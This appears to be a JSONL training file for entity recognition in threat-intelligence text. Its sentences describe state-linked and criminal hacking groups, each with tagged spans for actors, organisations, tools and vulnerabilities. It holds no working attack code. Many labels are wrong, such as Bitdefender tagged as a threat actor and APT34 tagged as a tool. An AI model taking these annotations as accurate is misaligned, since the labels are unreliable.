{"text": "Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells .", "spans": {"THREAT_ACTOR: APT33": [[86, 91]]}, "info": {"id": "dnrti_train_003365", "source": "dnrti_train"}}
{"text": "Symantec’s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors .", "spans": {"ORGANIZATION: Symantec’s": [[0, 10]], "THREAT_ACTOR: Elfin": [[11, 16]]}, "info": {"id": "dnrti_train_003366", "source": "dnrti_train"}}
{"text": "We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations .", "spans": {"ORGANIZATION: Nasr Institute": [[57, 71]], "THREAT_ACTOR: Group": [[92, 97]], "THREAT_ACTOR: APT33": [[159, 164]], "THREAT_ACTOR: APT35": [[167, 172]], "THREAT_ACTOR: MUDDYWATER": [[179, 189]]}, "info": {"id": "dnrti_train_003367", "source": "dnrti_train"}}
{"text": "Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) .", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: APT33": [[36, 41]]}, "info": {"id": "dnrti_train_003368", "source": "dnrti_train"}}
{"text": "FireEye also noted in their 2017 report that the online handle xman_1365_x , ” found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT33": [[111, 116]]}, "info": {"id": "dnrti_train_003369", "source": "dnrti_train"}}
{"text": "Recorded Future’s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) .", "spans": {"ORGANIZATION: Recorded Future’s": [[0, 17]], "THREAT_ACTOR: Insikt": [[18, 24]], "THREAT_ACTOR: Group": [[25, 30]], "THREAT_ACTOR: APT33": [[51, 56]]}, "info": {"id": "dnrti_train_003370", "source": "dnrti_train"}}
{"text": "Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure .", "spans": {"THREAT_ACTOR: Nasr": [[73, 77]]}, "info": {"id": "dnrti_train_003371", "source": "dnrti_train"}}
{"text": "Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33’s domain and hosting infrastructure in an effort to identify recent activity .", "spans": {"ORGANIZATION: Insikt": [[0, 6]], "ORGANIZATION: Recorded Future": [[98, 113]], "THREAT_ACTOR: APT33’s": [[239, 246]]}, "info": {"id": "dnrti_train_003372", "source": "dnrti_train"}}
{"text": "Insikt Group enumerated all domains reported as being used by APT33 since January 2019 .", "spans": {"ORGANIZATION: Insikt": [[0, 6]], "THREAT_ACTOR: APT33": [[62, 67]]}, "info": {"id": "dnrti_train_003373", "source": "dnrti_train"}}
{"text": "Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity .", "spans": {"ORGANIZATION: Recorded Future": [[16, 31]], "ORGANIZATION: Insikt Group": [[131, 143]], "THREAT_ACTOR: APT33": [[251, 256]]}, "info": {"id": "dnrti_train_003375", "source": "dnrti_train"}}
{"text": "Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure .", "spans": {"ORGANIZATION: Symantec": [[81, 89]], "THREAT_ACTOR: APT33": [[129, 134]]}, "info": {"id": "dnrti_train_003376", "source": "dnrti_train"}}
{"text": "Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants .", "spans": {"THREAT_ACTOR: APT33": [[29, 34]], "TOOL: RAT": [[214, 217]]}, "info": {"id": "dnrti_train_003377", "source": "dnrti_train"}}
{"text": "While we haven’t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims .", "spans": {"ORGANIZATION: we": [[6, 8]], "THREAT_ACTOR: APT33": [[126, 131]]}, "info": {"id": "dnrti_train_003378", "source": "dnrti_train"}}
{"text": "The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 .", "spans": {"TOOL: Poison Ivy": [[34, 44]], "THREAT_ACTOR: APT10": [[87, 92]]}, "info": {"id": "dnrti_train_003379", "source": "dnrti_train"}}
{"text": "The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang .", "spans": {"THREAT_ACTOR: APT34": [[75, 80]], "TOOL: PowerShell": [[98, 108]]}, "info": {"id": "dnrti_train_003380", "source": "dnrti_train"}}
{"text": "Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 .", "spans": {"ORGANIZATION: FireEye": [[42, 49]], "ORGANIZATION: Advanced Practices": [[113, 131]], "TOOL: APT34": [[255, 260]]}, "info": {"id": "dnrti_train_003381", "source": "dnrti_train"}}
{"text": "This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities .", "spans": {"THREAT_ACTOR: group": [[12, 17]]}, "info": {"id": "dnrti_train_003382", "source": "dnrti_train"}}
{"text": "Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 .", "spans": {"ORGANIZATION: FireEye Labs": [[38, 50]], "TOOL: PICKPOCKET": [[116, 126]], "THREAT_ACTOR: APT34": [[168, 173]]}, "info": {"id": "dnrti_train_003383", "source": "dnrti_train"}}
{"text": "APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]]}, "info": {"id": "dnrti_train_003384", "source": "dnrti_train"}}
{"text": "This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post .", "spans": {"THREAT_ACTOR: APT33": [[215, 220]], "ORGANIZATION: FireEye": [[258, 265]]}, "info": {"id": "dnrti_train_003385", "source": "dnrti_train"}}
{"text": "On June 19 , 2019 , FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances .", "spans": {"ORGANIZATION: FireEye’s": [[20, 29]], "ORGANIZATION: FireEye": [[123, 130]]}, "info": {"id": "dnrti_train_003386", "source": "dnrti_train"}}
{"text": "A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution .", "spans": {"MALWARE: TONEDEAF": [[110, 118]]}, "info": {"id": "dnrti_train_003387", "source": "dnrti_train"}}
{"text": "FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations .", "spans": {"ORGANIZATION: FireEye’s": [[0, 9]], "THREAT_ACTOR: APT34": [[117, 122]], "ORGANIZATION: victim organizations": [[139, 159]]}, "info": {"id": "dnrti_train_003388", "source": "dnrti_train"}}
{"text": "This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 .", "spans": {"TOOL: tool": [[5, 9]], "THREAT_ACTOR: APT34": [[113, 118]]}, "info": {"id": "dnrti_train_003390", "source": "dnrti_train"}}
{"text": "Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 .", "spans": {"THREAT_ACTOR: Carbanak": [[47, 55]]}, "info": {"id": "dnrti_train_003393", "source": "dnrti_train"}}
{"text": "One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak .", "spans": {"THREAT_ACTOR: Carbanak": [[108, 116]]}, "info": {"id": "dnrti_train_003394", "source": "dnrti_train"}}
{"text": "Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process .", "spans": {}, "info": {"id": "dnrti_train_003395", "source": "dnrti_train"}}
{"text": "The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions .", "spans": {"THREAT_ACTOR: group": [[9, 14]], "TOOL: framework": [[69, 78]]}, "info": {"id": "dnrti_train_003396", "source": "dnrti_train"}}
{"text": "A Carbanak trademark in cyberattacks remains the use of Cobalt Strike – a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors – which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools .", "spans": {"THREAT_ACTOR: Carbanak": [[2, 10]], "TOOL: Cobalt Strike": [[56, 69]]}, "info": {"id": "dnrti_train_003398", "source": "dnrti_train"}}
{"text": "However , this action doesn’t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 .", "spans": {}, "info": {"id": "dnrti_train_003399", "source": "dnrti_train"}}
{"text": "Bitdefender’s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank’s employees .", "spans": {"THREAT_ACTOR: Bitdefender’s": [[0, 13]]}, "info": {"id": "dnrti_train_003400", "source": "dnrti_train"}}
{"text": "The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active .", "spans": {"THREAT_ACTOR: Carbanak": [[4, 12]]}, "info": {"id": "dnrti_train_003401", "source": "dnrti_train"}}
{"text": "Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals .", "spans": {"THREAT_ACTOR: Its": [[0, 3]]}, "info": {"id": "dnrti_train_003402", "source": "dnrti_train"}}
{"text": "The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "TOOL: dumping credentials": [[124, 143]]}, "info": {"id": "dnrti_train_003404", "source": "dnrti_train"}}
{"text": "We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell .", "spans": {"THREAT_ACTOR: Emissary Panda": [[11, 25]], "VULNERABILITY: vulnerability": [[55, 68]], "VULNERABILITY: CVE-2019-0604": [[104, 117]]}, "info": {"id": "dnrti_train_003405", "source": "dnrti_train"}}
{"text": "Bitdefender’s investigation shows the attackers’ main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee’s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks .", "spans": {"THREAT_ACTOR: Bitdefender’s": [[0, 13]]}, "info": {"id": "dnrti_train_003406", "source": "dnrti_train"}}
{"text": "We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group .", "spans": {"TOOL: China Chopper webshell": [[18, 40]], "THREAT_ACTOR: Emissary Panda": [[101, 115]]}, "info": {"id": "dnrti_train_003407", "source": "dnrti_train"}}
{"text": "Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 .", "spans": {"VULNERABILITY: CVE-2017-0144": [[75, 88]]}, "info": {"id": "dnrti_train_003408", "source": "dnrti_train"}}
{"text": "This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers .", "spans": {}, "info": {"id": "dnrti_train_003410", "source": "dnrti_train"}}
{"text": "The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells (green and orange) within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 .", "spans": {}, "info": {"id": "dnrti_train_003411", "source": "dnrti_train"}}
{"text": "We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda .", "spans": {"THREAT_ACTOR: actors": [[21, 27]], "TOOL: HyperBro": [[63, 71]], "THREAT_ACTOR: Emissary Panda": [[106, 120]]}, "info": {"id": "dnrti_train_003414", "source": "dnrti_train"}}
{"text": "During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations .", "spans": {"ORGANIZATION: Unit 42": [[48, 55]], "THREAT_ACTOR: Emissary Panda": [[88, 102]], "ORGANIZATION: government organizations": [[146, 170]]}, "info": {"id": "dnrti_train_003416", "source": "dnrti_train"}}
{"text": "We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity .", "spans": {"THREAT_ACTOR: actors": [[21, 27]], "TOOL: HyperBro backdoor": [[42, 59]], "THREAT_ACTOR: Emissary Panda": [[204, 218]]}, "info": {"id": "dnrti_train_003417", "source": "dnrti_train"}}
{"text": "Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past .", "spans": {"THREAT_ACTOR: actor": [[20, 25]], "TOOL: HyperBro": [[61, 69]], "THREAT_ACTOR: Emissary Panda": [[103, 117]]}, "info": {"id": "dnrti_train_003418", "source": "dnrti_train"}}
{"text": "However , using NCC Group’s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign .", "spans": {"ORGANIZATION: NCC": [[16, 19], [177, 180]], "THREAT_ACTOR: Emissary Panda": [[210, 224]]}, "info": {"id": "dnrti_train_003422", "source": "dnrti_train"}}
{"text": "The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network .", "spans": {"TOOL: hack tools": [[31, 41]], "TOOL: Mimikatz": [[52, 60]], "TOOL: python scripts": [[105, 119]]}, "info": {"id": "dnrti_train_003423", "source": "dnrti_train"}}
{"text": "Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs .", "spans": {}, "info": {"id": "dnrti_train_003424", "source": "dnrti_train"}}
{"text": "According to Microsoft’s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 .", "spans": {"ORGANIZATION: Microsoft’s": [[13, 24]]}, "info": {"id": "dnrti_train_003428", "source": "dnrti_train"}}
{"text": "Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems .", "spans": {"THREAT_ACTOR: they": [[68, 72]], "TOOL: China Chopper": [[78, 91]]}, "info": {"id": "dnrti_train_003430", "source": "dnrti_train"}}
{"text": "We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before .", "spans": {"THREAT_ACTOR: Emissary Panda": [[17, 31]]}, "info": {"id": "dnrti_train_003431", "source": "dnrti_train"}}
{"text": "Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers .", "spans": {"ORGANIZATION: vulnerable servers": [[130, 148]]}, "info": {"id": "dnrti_train_003432", "source": "dnrti_train"}}
{"text": "We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before .", "spans": {"THREAT_ACTOR: actors": [[21, 27]], "TOOL: Sublime Text": [[99, 111]], "TOOL: Media application": [[151, 168]]}, "info": {"id": "dnrti_train_003433", "source": "dnrti_train"}}
{"text": "It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government .", "spans": {"THREAT_ACTOR: It": [[0, 2]]}, "info": {"id": "dnrti_train_003434", "source": "dnrti_train"}}
{"text": "The group’s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task .", "spans": {"THREAT_ACTOR: group’s": [[4, 11]], "TOOL: stealing tools": [[72, 86]], "TOOL: document stealers": [[119, 136]]}, "info": {"id": "dnrti_train_003435", "source": "dnrti_train"}}
{"text": "The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago .", "spans": {"TOOL: EvilGnome": [[23, 32]], "THREAT_ACTOR: Gamaredon group": [[86, 101]]}, "info": {"id": "dnrti_train_003436", "source": "dnrti_train"}}
{"text": "FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]]}, "info": {"id": "dnrti_train_003437", "source": "dnrti_train"}}
{"text": "The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year .", "spans": {"THREAT_ACTOR: FIN7": [[4, 8]]}, "info": {"id": "dnrti_train_003438", "source": "dnrti_train"}}
{"text": "In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations .", "spans": {"ORGANIZATION: we": [[41, 43]], "THREAT_ACTOR: attacker groups": [[85, 100]], "THREAT_ACTOR: FIN7": [[134, 138]]}, "info": {"id": "dnrti_train_003439", "source": "dnrti_train"}}
{"text": "In 2018-2019 , researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests .", "spans": {"ORGANIZATION: Kaspersky": [[30, 39]], "THREAT_ACTOR: FIN7": [[178, 182]], "THREAT_ACTOR: threat actor": [[230, 242]]}, "info": {"id": "dnrti_train_003440", "source": "dnrti_train"}}
{"text": "One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email HackOrges , leading us to think that more than 130 companies had been targeted by the end of 2018 .", "spans": {"THREAT_ACTOR: FIN7": [[27, 31]]}, "info": {"id": "dnrti_train_003441", "source": "dnrti_train"}}
{"text": "Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 .", "spans": {"THREAT_ACTOR: FIN7": [[73, 77]], "TOOL: malicious Office document": [[134, 159]]}, "info": {"id": "dnrti_train_003442", "source": "dnrti_train"}}
{"text": "Given FIN7’s previous use of false security companies , we decided to look deeper into this one .", "spans": {"THREAT_ACTOR: FIN7’s": [[6, 12]], "ORGANIZATION: security companies": [[35, 53]]}, "info": {"id": "dnrti_train_003445", "source": "dnrti_train"}}
{"text": "This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions .", "spans": {"THREAT_ACTOR: activity cluster": [[5, 21]], "ORGANIZATION: Kaspersky": [[30, 39]]}, "info": {"id": "dnrti_train_003446", "source": "dnrti_train"}}
{"text": "FIN7’s last campaigns were targeting banks in Europe and Central America .", "spans": {"THREAT_ACTOR: FIN7’s": [[0, 6]]}, "info": {"id": "dnrti_train_003447", "source": "dnrti_train"}}
{"text": "After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access .", "spans": {"THREAT_ACTOR: FIN7": [[33, 37]], "TOOL: backdoors": [[51, 60]], "TOOL: CobaltStrike framework": [[69, 91]], "TOOL: Powershell": [[95, 105]]}, "info": {"id": "dnrti_train_003448", "source": "dnrti_train"}}
{"text": "AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members .", "spans": {"THREAT_ACTOR: AveMaria": [[0, 8]], "THREAT_ACTOR: FIN7": [[107, 111]]}, "info": {"id": "dnrti_train_003449", "source": "dnrti_train"}}
{"text": "This threat actor stole suspected of stealing €13 million from Bank of Valetta , Malta earlier this year .", "spans": {"THREAT_ACTOR: threat actor": [[5, 17]], "ORGANIZATION: Bank": [[63, 67]]}, "info": {"id": "dnrti_train_003450", "source": "dnrti_train"}}
{"text": "They also use AutoIT droppers , password-protected EXE files and even ISO images .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "TOOL: AutoIT droppers": [[14, 29]]}, "info": {"id": "dnrti_train_003452", "source": "dnrti_train"}}
{"text": "Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center .", "spans": {"THREAT_ACTOR: actor": [[21, 26]]}, "info": {"id": "dnrti_train_003454", "source": "dnrti_train"}}
{"text": "At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste” from a previously unknown APT .", "spans": {"THREAT_ACTOR: FIN7": [[45, 49]]}, "info": {"id": "dnrti_train_003455", "source": "dnrti_train"}}
{"text": "FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4], [55, 59]], "THREAT_ACTOR: Cobalt": [[9, 15]]}, "info": {"id": "dnrti_train_003456", "source": "dnrti_train"}}
{"text": "Quite recently , FIN7 threat actors typosquatted the brand Digicert” using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants .", "spans": {"THREAT_ACTOR: FIN7": [[17, 21]], "ORGANIZATION: Digicert”": [[59, 68]], "TOOL: command": [[131, 138]], "TOOL: control server": [[143, 157]]}, "info": {"id": "dnrti_train_003457", "source": "dnrti_train"}}
{"text": "The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers .", "spans": {"THREAT_ACTOR: CobaltGoblin": [[18, 30]], "THREAT_ACTOR: Carbanak": [[31, 39]], "THREAT_ACTOR: EmpireMonkey": [[40, 52]]}, "info": {"id": "dnrti_train_003459", "source": "dnrti_train"}}
{"text": "We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks .", "spans": {"ORGANIZATION: We": [[0, 2]], "THREAT_ACTOR: groups": [[86, 92]], "TOOL: similar toolkits": [[104, 120]], "TOOL: infrastructure": [[134, 148]]}, "info": {"id": "dnrti_train_003460", "source": "dnrti_train"}}
{"text": "The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center .", "spans": {"THREAT_ACTOR: CopyPaste": [[39, 48]], "ORGANIZATION: companies": [[93, 102]], "ORGANIZATION: training center": [[208, 223]]}, "info": {"id": "dnrti_train_003461", "source": "dnrti_train"}}
{"text": "At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks .", "spans": {"THREAT_ACTOR: cluster": [[25, 32]], "TOOL: CobaltStrike": [[57, 69]], "TOOL: Powershell": [[79, 89]]}, "info": {"id": "dnrti_train_003462", "source": "dnrti_train"}}
{"text": "FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]]}, "info": {"id": "dnrti_train_003463", "source": "dnrti_train"}}
{"text": "MuddyWater is widely regarded as a long-lived APT group in the Middle East .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_003464", "source": "dnrti_train"}}
{"text": "From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan .", "spans": {"THREAT_ACTOR: MuddyWater": [[30, 40]], "ORGANIZATION: governments": [[93, 104]]}, "info": {"id": "dnrti_train_003465", "source": "dnrti_train"}}
{"text": "FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]]}, "info": {"id": "dnrti_train_003466", "source": "dnrti_train"}}
{"text": "We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android Malware , and More .", "spans": {"THREAT_ACTOR: MuddyWater": [[53, 63]], "TOOL: Android malware": [[97, 112]], "TOOL: Multi-Stage Backdoors": [[246, 267]], "TOOL: False Flags": [[270, 281]], "TOOL: Android Malware": [[284, 299]]}, "info": {"id": "dnrti_train_003467", "source": "dnrti_train"}}
{"text": "Instead , the campaign used compromised legitimate accounts to trick victims into installing malware .", "spans": {"TOOL: compromised legitimate accounts": [[28, 59]]}, "info": {"id": "dnrti_train_003468", "source": "dnrti_train"}}
{"text": "Notably , the group’s use of email as infection vector seems to yield success for their campaigns .", "spans": {"THREAT_ACTOR: group’s": [[14, 21]], "TOOL: email": [[29, 34]]}, "info": {"id": "dnrti_train_003469", "source": "dnrti_train"}}
{"text": "We also observed MuddyWater’s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target .", "spans": {"THREAT_ACTOR: MuddyWater’s": [[17, 29]], "TOOL: post-exploitation tools": [[58, 81]]}, "info": {"id": "dnrti_train_003470", "source": "dnrti_train"}}
{"text": "The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]], "TOOL: delivered payloads": [[134, 152]]}, "info": {"id": "dnrti_train_003471", "source": "dnrti_train"}}
{"text": "The main payload is usually Imminent Monitor RAT; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT .", "spans": {"MALWARE: Monitor RAT;": [[37, 49]], "MALWARE: LuminosityLink RAT": [[115, 133]], "MALWARE: NetWire RAT": [[136, 147]], "MALWARE: NjRAT": [[154, 159]]}, "info": {"id": "dnrti_train_003472", "source": "dnrti_train"}}
{"text": "But with the West African gang we’ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime .", "spans": {"THREAT_ACTOR: Scattered Canary": [[43, 59]]}, "info": {"id": "dnrti_train_003476", "source": "dnrti_train"}}
{"text": "In a recent report , the FBI’s Internet Crime Complaint Center (IC3) reported that more than 20 , 000 businesses lost nearly $1.3 billion to BEC attacks in 2018 .", "spans": {"ORGANIZATION: FBI’s": [[25, 30]]}, "info": {"id": "dnrti_train_003477", "source": "dnrti_train"}}
{"text": "This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we’ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business .", "spans": {"ORGANIZATION: Agari Cyber Intelligence": [[26, 50]], "THREAT_ACTOR: group": [[83, 88]], "THREAT_ACTOR: Scattered Canary": [[101, 117]]}, "info": {"id": "dnrti_train_003478", "source": "dnrti_train"}}
{"text": "While this criminal organization’s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 .", "spans": {"ORGANIZATION: organization’s": [[20, 34]]}, "info": {"id": "dnrti_train_003479", "source": "dnrti_train"}}
{"text": "On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer .", "spans": {"THREAT_ACTOR: Scattered Canary": [[24, 40]]}, "info": {"id": "dnrti_train_003480", "source": "dnrti_train"}}
{"text": "Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other way .", "spans": {"THREAT_ACTOR: they": [[73, 77]]}, "info": {"id": "dnrti_train_003481", "source": "dnrti_train"}}
{"text": "Scattered Canary’s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[0, 18]], "THREAT_ACTOR: group": [[91, 96]]}, "info": {"id": "dnrti_train_003482", "source": "dnrti_train"}}
{"text": "By March 2016 , one of Scattered Canary’s members had built enough trust with a romance victim—who we’ll call Jane—that she became a frequent source of new mule accounts for the group .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[23, 41]], "THREAT_ACTOR: group": [[178, 183]]}, "info": {"id": "dnrti_train_003483", "source": "dnrti_train"}}
{"text": "By all accounts , late 2015 was the beginning of BEC for Scattered Canary .", "spans": {"THREAT_ACTOR: Scattered Canary": [[57, 73]]}, "info": {"id": "dnrti_train_003485", "source": "dnrti_train"}}
{"text": "The first type of attack Scattered Canary pivoted to was credential phishing .", "spans": {"THREAT_ACTOR: Scattered Canary": [[25, 41]]}, "info": {"id": "dnrti_train_003486", "source": "dnrti_train"}}
{"text": "Between July 2015 and February 2016 , Scattered Canary’s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[38, 56]]}, "info": {"id": "dnrti_train_003487", "source": "dnrti_train"}}
{"text": "In the first few months of their credential phishing ventures , Scattered Canary’s sights were mostly set on Asian targets—Malaysia and Japan , in particular .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[64, 82]]}, "info": {"id": "dnrti_train_003488", "source": "dnrti_train"}}
{"text": "In November 2015 , the group started to focus on North American users , mostly in the United States .", "spans": {"THREAT_ACTOR: group": [[23, 28]]}, "info": {"id": "dnrti_train_003489", "source": "dnrti_train"}}
{"text": "For over eighteen months from March 2017 until November 2018 , Scattered Canary’s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada .", "spans": {"THREAT_ACTOR: Scattered Canary’s": [[63, 81]]}, "info": {"id": "dnrti_train_003491", "source": "dnrti_train"}}
